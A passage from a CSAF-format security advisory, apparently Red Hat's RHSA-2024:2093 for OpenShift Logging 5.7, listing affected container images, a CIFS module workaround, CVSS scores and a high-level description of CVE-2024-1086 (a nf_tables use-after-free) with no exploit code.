"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:2093"
},
{
"category": "workaround",
"details": "To mitigate this issue, prevent module cifs from being loaded. Please see https://access.redhat.com/solutions/41278 for how to blacklist a kernel module to prevent it from loading automatically.",
"product_ids": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:A/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: CIFS Filesystem Decryption Improper Input Validation Remote Code Execution Vulnerability in function receive_encrypted_standard of client"
},
{
"cve": "CVE-2024-1086",
"cwe": {
"id": "CWE-416",
"name": "Use After Free"
},
"discovery_date": "2024-01-31T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2262126"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Netfilter subsystem in the Linux kernel. This issue occurs in the nft_verdict_init() function, allowing positive values as a drop error within the hook verdict, therefore, the nf_hook_slow() function can cause a double-free vulnerability when NF_DROP is issued with a drop error that resembles NF_ACCEPT. The nf_tables component can be exploited to achieve local privilege escalation.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: nf_tables: use-after-free vulnerability in the nft_verdict_init() function",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw is rated as having an Important impact. There is the limitation that it can only be exploited by a local user with access to Netfilter, but can still allow privilege escalation if user namespaces are enabled and Netfilter is being used.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
